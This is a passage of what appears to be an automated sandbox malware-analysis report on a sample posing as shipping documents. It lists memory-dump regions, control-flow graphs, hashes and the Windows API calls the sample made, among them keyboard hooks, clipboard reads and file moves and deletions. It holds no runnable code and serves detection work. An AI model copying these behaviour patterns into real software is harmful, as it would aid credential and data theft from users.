                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq
                      • API String ID: 0-2086306503
                      • Opcode ID: 3ce107ab05b3b0a98661419a02f019ea17ec7e593c07484f093d832401975a46
                      • Instruction ID: 8f2d9577606f34e6a903dc145da950c8f554e7091e055fef16fe2ebc8ccea3ad
                      • Opcode Fuzzy Hash: 3ce107ab05b3b0a98661419a02f019ea17ec7e593c07484f093d832401975a46
                      • Instruction Fuzzy Hash: 29620230B002168FCB65EF68D690A5DB7B2FF85314F208A68D4099F769DB75ED85CB80

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 627 6724718-672473c 628 672473e-6724741 627->628 629 6724e20-6724e23 628->629 630 6724747-672483f 628->630 631 6724e44-6724e46 629->631 632 6724e25-6724e3f 629->632 650 67248c2-67248c9 630->650 651 6724845-6724892 call 6724fc0 630->651 634 6724e48 631->634 635 6724e4d-6724e50 631->635 632->631 634->635 635->628 636 6724e56-6724e63 635->636 652 67248cf-672493f 650->652 653 672494d-6724956 650->653 664 6724898-67248b4 651->664 670 6724941 652->670 671 672494a 652->671 653->636 668 67248b6 664->668 669 67248bf 664->669 668->669 669->650 670->671 671->653
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: fpq$XPpq$\Opq
                      • API String ID: 0-2571271785
                      • Opcode ID: 9c2c9c4217412b97f34d74084f98e2f8795902ed5af4121b162ac5cc6db77928
                      • Instruction ID: ca573e43577f0577cfd9d392f43d6ebdee4d051b93f01dedc78063cf4d28fed0
                      • Opcode Fuzzy Hash: 9c2c9c4217412b97f34d74084f98e2f8795902ed5af4121b162ac5cc6db77928
                      • Instruction Fuzzy Hash: 62618170F002199FEB549FA9C9547AEBBF6EF88300F208429E506EB399DE754C45CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 673 2b086f0-2b086f8 674 2b086fa-2b08715 673->674 675 2b0869f-2b086cd MoveFileA 673->675 679 2b08717-2b0871a 674->679 677 2b086d6-2b086ea 675->677 678 2b086cf-2b086d5 675->678 678->677 680 2b0871c-2b08730 679->680 681 2b0874d-2b08750 679->681 692 2b08732-2b08734 680->692 693 2b08736 680->693 683 2b08760-2b08763 681->683 684 2b08752 call 2b09127 681->684 685 2b08765-2b0876c 683->685 686 2b08777-2b0877a 683->686 694 2b08758-2b0875b 684->694 688 2b08772 685->688 689 2b08928-2b0892f 685->689 690 2b087b6-2b087b8 686->690 691 2b0877c-2b087b1 686->691 688->686 698 2b08931 call 2b0fa4a 689->698 699 2b0893e-2b08945 689->699 696 2b087ba 690->696 697 2b087bf-2b087c2 690->697 691->690 695 2b08739-2b08748 692->695 693->695 694->683 695->681 696->697 697->679 700 2b087c8-2b087d7 697->700 702 2b08937 698->702 704 2b08801-2b08817 700->704 705 2b087d9-2b087dc 700->705 702->699 704->689 707 2b087e4-2b087ff 705->707 707->704 707->705
                      APIs
                      • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02B086C0
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: FileMove
                      • String ID: LRkq
                      • API String ID: 3562171763-1052062081
                      • Opcode ID: 813af7a0aa6d187f2fdd84664e2491076705c4ad4da88cf5fce996544eb30ad2
                      • Instruction ID: d99e3e8b7fa81f9b670aadef9b06aa8cc13ec1839697030f86ffd0c91db9acf2
                      • Opcode Fuzzy Hash: 813af7a0aa6d187f2fdd84664e2491076705c4ad4da88cf5fce996544eb30ad2
                      • Instruction Fuzzy Hash: 0E41C170E102099FDF26CFA8D884B9EBFB2FF45310F1084A9E905EB294DB75A945CB51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 713 66c8944-66c89a0 714 66c89aa-66c89e8 OleGetClipboard 713->714 715 66c89ea-66c89f0 714->715 716 66c89f1-66c8a3f 714->716 715->716 721 66c8a4f 716->721 722 66c8a41-66c8a45 716->722 724 66c8a50 721->724 722->721 723 66c8a47 722->723 723->721 724->724
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Clipboard
                      • String ID: U
                      • API String ID: 220874293-3372436214
                      • Opcode ID: daffc930bd6e48a0b4daa4b61d10ec942d4a286417299b73ed43ed18355ccb6a
                      • Instruction ID: 4db5962c1983c34552e6c9eed983c57cc3c11e651e31625a68b29f7e94f0e366
                      • Opcode Fuzzy Hash: daffc930bd6e48a0b4daa4b61d10ec942d4a286417299b73ed43ed18355ccb6a
                      • Instruction Fuzzy Hash: 2931F2B0901648DFDB24CF99C984BDEBFF1EB88314F248059E408BB294DB759845CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 934 6728cb7-6728cc0 936 6728cc2-6728ced 934->936 937 6728d29-6728d3b 934->937 938 6728cef-6728cf2 936->938 942 6728d46-6728d48 937->942 940 67295b0-67295b3 938->940 941 6728cf8-6728d0d 938->941 943 67295b5-67295d4 940->943 944 67295d9-67295db 940->944 951 6728d25-6728d3b 941->951 952 6728d0f-6728d15 941->952 948 6728d60-6728dd1 942->948 949 6728d4a-6728d50 942->949 943->944 946 67295e2-67295e5 944->946 947 67295dd 944->947 946->938 953 67295eb-67295f5 946->953 947->946 968 6728dd3-6728df6 948->968 969 6728dfd-6728e19 948->969 954 6728d52 949->954 955 6728d54-6728d56 949->955 951->942 957 6728d17 952->957 958 6728d19-6728d1b 952->958 954->948 955->948 957->951 958->951 968->969 974 6728e45-6728e60 969->974 975 6728e1b-6728e3e 969->975 980 6728e62-6728e84 974->980 981 6728e8b-6728ea6 974->981 975->974 980->981 986 6728ecb-6728ed9 981->986 987 6728ea8-6728ec4 981->987 988 6728edb-6728ee4 986->988 989 6728ee9-6728f63 986->989 987->986 988->953 995 6728fb0-6728fc5 989->995 996 6728f65-6728f83 989->996 995->940 1000 6728f85-6728f94 996->1000 1001 6728f9f-6728fae 996->1001 1000->1001 1001->995 1001->996
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: f7c2f021419da3eb651f4fed412d4e194afb0e05e1cb770233225c56c6271cca
                      • Instruction ID: 927cdb2e2bbe1b48346b615052af1b7023cbb63ea6760db048fde6b2f8f60e04
                      • Opcode Fuzzy Hash: f7c2f021419da3eb651f4fed412d4e194afb0e05e1cb770233225c56c6271cca
                      • Instruction Fuzzy Hash: 23515330F0021A8FDB64EF75DA5076EB3F6EB88640F50896AC505D7798EA31EC45CB91
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066C33AA
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: ff6d442b68b7b0e7b262173d16084c720571ee9c2ec457b3e1f1d279f2dbbba8
                      • Instruction ID: 24b4dc115e3380b85ac921c4c128cd14f52f6a028b697bc3328585069cae8067
                      • Opcode Fuzzy Hash: ff6d442b68b7b0e7b262173d16084c720571ee9c2ec457b3e1f1d279f2dbbba8
                      • Instruction Fuzzy Hash: 2451CFB1D00349DFDB14CF9AD984ADEBBB5FF48310F24812AE818AB210D7759985CF90
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066C33AA
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: f078259e9c9d4c0a740505ad99d8ed0dae388aef6b4b13285e1f972ed41c3044
                      • Instruction ID: cbc9e7228637ff22c64fbeb4329c946523443f87233377574d3a3930596c703c
                      • Opcode Fuzzy Hash: f078259e9c9d4c0a740505ad99d8ed0dae388aef6b4b13285e1f972ed41c3044
                      • Instruction Fuzzy Hash: EA41BEB1D00349DFDB14CF9AC984ADEBBB5FF48310F24812AE419AB210DB759885CF90
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 066C7CC9
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 238c377029a9c41104b9d6be09ec3b1d3699a40803e484977752997a2309a533
                      • Instruction ID: a704c46569f789c85ca55ce3aca61c84830b392e3fa099e4f09e0d8f304b78f6
                      • Opcode Fuzzy Hash: 238c377029a9c41104b9d6be09ec3b1d3699a40803e484977752997a2309a533
                      • Instruction Fuzzy Hash: E54106B5A00605CFDB54CF99C488AAABBF5FB88324F24C459E519AB321D734A841CFA0
                      APIs
                      • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02B086C0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: c1a572a64cb4fa768db1e9effcb00a5ec1eef2143277d182936d06e038f7162f
                      • Instruction ID: dc6bbc218e196624a20fe5ef7c5a2217fd9b6e6067366c1aa1f21d7e810eecc1
                      • Opcode Fuzzy Hash: c1a572a64cb4fa768db1e9effcb00a5ec1eef2143277d182936d06e038f7162f
                      • Instruction Fuzzy Hash: 2B316BB6C013499FCB11CF99D884ADEBFF4FF88310F15809AD858AB255D7749A04CBA5
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Clipboard
                      • String ID:
                      • API String ID: 220874293-0
                      • Opcode ID: 32c65cb835e5dd16c7dfb0c37c1759df1a7203a724850fc24a55aab3b205aef0
                      • Instruction ID: bbf009a3cd264e54e3a218ce46fe59b5c49c7e94803b2dff622719eb85b1a286
                      • Opcode Fuzzy Hash: 32c65cb835e5dd16c7dfb0c37c1759df1a7203a724850fc24a55aab3b205aef0
                      • Instruction Fuzzy Hash: B231EFB0D01208DFDB24DF99C984B9EBFF5EB88314F248059E404BB2A4DB74A845CF95
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066C6DF7
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: fefa6ce404a8c5b865b39b6b20d31c8a2dc3a1f3f34ed61f688d87ed987af0c0
                      • Instruction ID: 3b1f8659e37cbd9a7f2aacebebbc9d6182a2d7506062abd1090d1771f1e0ef37
                      • Opcode Fuzzy Hash: fefa6ce404a8c5b865b39b6b20d31c8a2dc3a1f3f34ed61f688d87ed987af0c0
                      • Instruction Fuzzy Hash: C821E5B5900248EFDB10CFAAD984ADEBFF4EB48320F14841AE954A7351D374A944CFA5
                      APIs
                      • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02B086C0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: a52e5026e3f2bcfc8dc344f23ee019eb72579a13a56b3499b51d080477d7a694
                      • Instruction ID: 2a7511756dfa6c2208a0a4e602e5854fffd523a8aa87b692a27cdaa27d3a292a
                      • Opcode Fuzzy Hash: a52e5026e3f2bcfc8dc344f23ee019eb72579a13a56b3499b51d080477d7a694
                      • Instruction Fuzzy Hash: F62113B6C012089FCB10CF99D884ADEBFF5FB88310F15805AE818AB244D7759A40CBA4
                      APIs
                      • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 066CA78B
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: 214dec22c55b1f5fbd6000ca8d9a97f19cc0a438b60d2373154debb2170c168d
                      • Instruction ID: c43fb548a97a77ccf4787a1005906a76d6febbf299e85cf8f07fa8539235e0f7
                      • Opcode Fuzzy Hash: 214dec22c55b1f5fbd6000ca8d9a97f19cc0a438b60d2373154debb2170c168d
                      • Instruction Fuzzy Hash: 812107B59002099FCB54DFAAD944BEEFBF9FB48320F10842AE455A7250C774A944CFA5
                      APIs
                      • MoveFileA.KERNEL32(?,00000000,?,?), ref: 02B086C0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: e3f16335eedb2ed2559579c97eb5ad323b4939a2394cc67bc8f293f0329bac39
                      • Instruction ID: 717e0c065850c58107854aa1dd61e797ed49a4c4a9d0efb8a0f2b7d61ee8804d
                      • Opcode Fuzzy Hash: e3f16335eedb2ed2559579c97eb5ad323b4939a2394cc67bc8f293f0329bac39
                      • Instruction Fuzzy Hash: 492113B6C01208DFCB01CF99E584ADEBFB1BB88310F25845AE818AB244C7359A40CBA4
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066C6DF7
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: c8627e71f99277c43c6fa49d41e0bf068e5105c649aeb8d13a3f14f0afdafd0f
                      • Instruction ID: 25f0fad7884d71e75dd178ee0e6dc920c364c12d1147a9152e0ac7db4fed5a87
                      • Opcode Fuzzy Hash: c8627e71f99277c43c6fa49d41e0bf068e5105c649aeb8d13a3f14f0afdafd0f
                      • Instruction Fuzzy Hash: A021B3B59002589FDB10CF9AD984ADEBFF4EB48320F14841AE954A7350D374A954CFA5
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 066C2256
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 3ef496236b937505a52267b25d97a20575be32cc25964b29a733e3a43a3ca1f9
                      • Instruction ID: 0eba89ee5506feddd21b26d506038b3fd0279b6b277339ea7d037a63e624b35d
                      • Opcode Fuzzy Hash: 3ef496236b937505a52267b25d97a20575be32cc25964b29a733e3a43a3ca1f9
                      • Instruction Fuzzy Hash: 1B2138B5C057888FCB11CFAAC854ADEBFF4EF49210F14859AD458A7252C3786545CFA1
                      APIs
                      • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 066CA78B
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: b5c51a29d9760f23b90378bddab9da0453ee32bfba3f1914f635f18ab1b23102
                      • Instruction ID: 0120c9fc22bb37d1d4a9aa752e86ae9ad4e312738be4ef195c286b1540ed5ccb
                      • Opcode Fuzzy Hash: b5c51a29d9760f23b90378bddab9da0453ee32bfba3f1914f635f18ab1b23102
                      • Instruction Fuzzy Hash: D22102B59002099FCB54CF9AC944BEEBBF5FB88320F10842AD459A7250C774A940CFA4
                      APIs
                      • DeleteFileW.KERNELBASE(00000000), ref: 02B080D0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 4ad2a92baed54045780c30fd5410745ecf268b0fb8340c501c23a08a20cd3b3e
                      • Instruction ID: 057e9ff9591e6a16d01ffcbcf1e9b15a02d9acc8c5e17a4ec6954c529d4981d4
                      • Opcode Fuzzy Hash: 4ad2a92baed54045780c30fd5410745ecf268b0fb8340c501c23a08a20cd3b3e
                      • Instruction Fuzzy Hash: 381136B1C006199BCB10CF9AD544B9EFBB4FB48320F10816AD858B7250D778AA40CFA5
                      APIs
                      • DeleteFileW.KERNELBASE(00000000), ref: 02B080D0
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: d708fe32e8f3d01c766be5284025834e8fe31eabe14ccd5dddb5d20df84803ef
                      • Instruction ID: 15e5103c5afc8bf1ec50466635b1c5ff94c4472014edb0fbe26146e7eb46f1b2
                      • Opcode Fuzzy Hash: d708fe32e8f3d01c766be5284025834e8fe31eabe14ccd5dddb5d20df84803ef
                      • Instruction Fuzzy Hash: C72136B6C006199BCB10CF99D544BEEFBB4BF08320F14826AD858B7250D338AA40CFA5
                      APIs
                      • GlobalMemoryStatusEx.KERNELBASE ref: 02B0F47F
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID:
                      • API String ID: 1890195054-0
                      • Opcode ID: fb6e2bd283e9e5c035dceea344bcd816da52553bfc5c0531e95af87c680862a3
                      • Instruction ID: b13e8b48674e467cf138820eb1a73ab8b405f19b59c5b75dd9fc6e65c4b8aa37
                      • Opcode Fuzzy Hash: fb6e2bd283e9e5c035dceea344bcd816da52553bfc5c0531e95af87c680862a3
                      • Instruction Fuzzy Hash: 261133B1D0021A9BCB10CF99C584BDEFBF4BB48320F14816AD818B7290D778A954CFA4
                      APIs
                      • GlobalMemoryStatusEx.KERNELBASE ref: 02B0F47F
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID:
                      • API String ID: 1890195054-0
                      • Opcode ID: 312a2f305f709caa1e54c2a2584026b0c3316e06acb75419015668ed23caea93
                      • Instruction ID: c2a735ccb3828658c849bfbf8096b456e6b404fab962be0a14d92616ff4925f0
                      • Opcode Fuzzy Hash: 312a2f305f709caa1e54c2a2584026b0c3316e06acb75419015668ed23caea93
                      • Instruction Fuzzy Hash: 201112B1D002699BCB10CF9AC544BDEFBF4FB48320F14816AD818B7250D778A940CFA5
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 066C2256
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 93ca7d4398a735b088228fc7da531628d70cc4a73a42ef0f425cdc8cbccb4086
                      • Instruction ID: cd1509020cd806346da5f94b39bc75bad68b58473cce4e83aee9e5ef429bbeb3
                      • Opcode Fuzzy Hash: 93ca7d4398a735b088228fc7da531628d70cc4a73a42ef0f425cdc8cbccb4086
                      • Instruction Fuzzy Hash: 851104B5D007498FCB10DF9AD444ADEFBF8EB48324F10842AD929B7610D379A545CFA5
                      APIs
                      • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,066C8315), ref: 066C839F
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CallbackDispatcherUser
                      • String ID:
                      • API String ID: 2492992576-0
                      • Opcode ID: ef2727669a11fb031f1280cceaa298555cc15535cfb20126976814bfeabc46d0
                      • Instruction ID: 713b6b9d2c87d0c42b20467e0b65c960f5b57f2e939e532c1056acc74341c889
                      • Opcode Fuzzy Hash: ef2727669a11fb031f1280cceaa298555cc15535cfb20126976814bfeabc46d0
                      • Instruction Fuzzy Hash: 091100B5800648DFCB20DF9AD844BDEFFF8EB48324F20845AD959A7250D774A944CFA5
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 066C885D
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 3b29bd532d1d7314a91e635c8ce147f2939ab41e8e2d675a94cffb89d586afce
                      • Instruction ID: db3674bcb18efd8692f7374f116d87454b573b6e2ebdfe42ed3c962e4090a5e8
                      • Opcode Fuzzy Hash: 3b29bd532d1d7314a91e635c8ce147f2939ab41e8e2d675a94cffb89d586afce
                      • Instruction Fuzzy Hash: 0D1103B59007489FDB60DF9AD444B9EBFF4EB48320F208459D519A7610D378A944CFA5
                      APIs
                      • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,066C8315), ref: 066C839F
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CallbackDispatcherUser
                      • String ID:
                      • API String ID: 2492992576-0
                      • Opcode ID: f9f26165c5ec35ab39630ef8237f1548eeb3387170ca29997ed4a9bc7d393650
                      • Instruction ID: f1570078ea23685dad4d7b8be812ee224ea4281ddff892dd870a5688c6988ee4
                      • Opcode Fuzzy Hash: f9f26165c5ec35ab39630ef8237f1548eeb3387170ca29997ed4a9bc7d393650
                      • Instruction Fuzzy Hash: 4C1122B1800648CFCB60DF9AC444BEEBFF4EB48320F20842DD919A7250C374A940CFA4
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 066C885D
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 67a00908331c746784a5806cb779a6f46a3bb20fe1498c8efa5e68c0b401e83a
                      • Instruction ID: cef665858850f92c5f117b0b5e99f1e9f9bfc406fc6a0b910dd3ef198ef4e1b1
                      • Opcode Fuzzy Hash: 67a00908331c746784a5806cb779a6f46a3bb20fe1498c8efa5e68c0b401e83a
                      • Instruction Fuzzy Hash: 201133B0900249CFDB20DFA9D444BDEFFF4EB48324F10845AD458A7610C374A540CFA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: ce87e13637b1c7ef313f080ca34b2fc75929b4d45fbf842bd3e4ea9ea4b8f463
                      • Instruction ID: d3497c02c58c02554cdd340883e51ca9ab02c3c020f402618d3ae66170e57df6
                      • Opcode Fuzzy Hash: ce87e13637b1c7ef313f080ca34b2fc75929b4d45fbf842bd3e4ea9ea4b8f463
                      • Instruction Fuzzy Hash: 7941B170E0031ADFDB61DF65C9546AEBBB6BF85340F204929E401EB380DB75D986CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: XPpq
                      • API String ID: 0-1266478781
                      • Opcode ID: 0b0f5ec8114f2137e7fb6e9af9a18faebe982cfd9c2606b089c047036c37a28e
                      • Instruction ID: a306369068ab7e9f37133abf33e5a1382dfce1607de91f5428a9e8305ed02888
                      • Opcode Fuzzy Hash: 0b0f5ec8114f2137e7fb6e9af9a18faebe982cfd9c2606b089c047036c37a28e
                      • Instruction Fuzzy Hash: 33417070F002199FEB54DFA5C914BAEBBF7AF88300F208529D506AB399DA748C45CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: aa1e98226e0fc4ccc10b36e05cbfd30d129e4919404e53eac638e1c0c2af24cb
                      • Instruction ID: 57b89339209421e3cde9d7c3de63219df5df67f9099a4d3a6c82ce309c946562
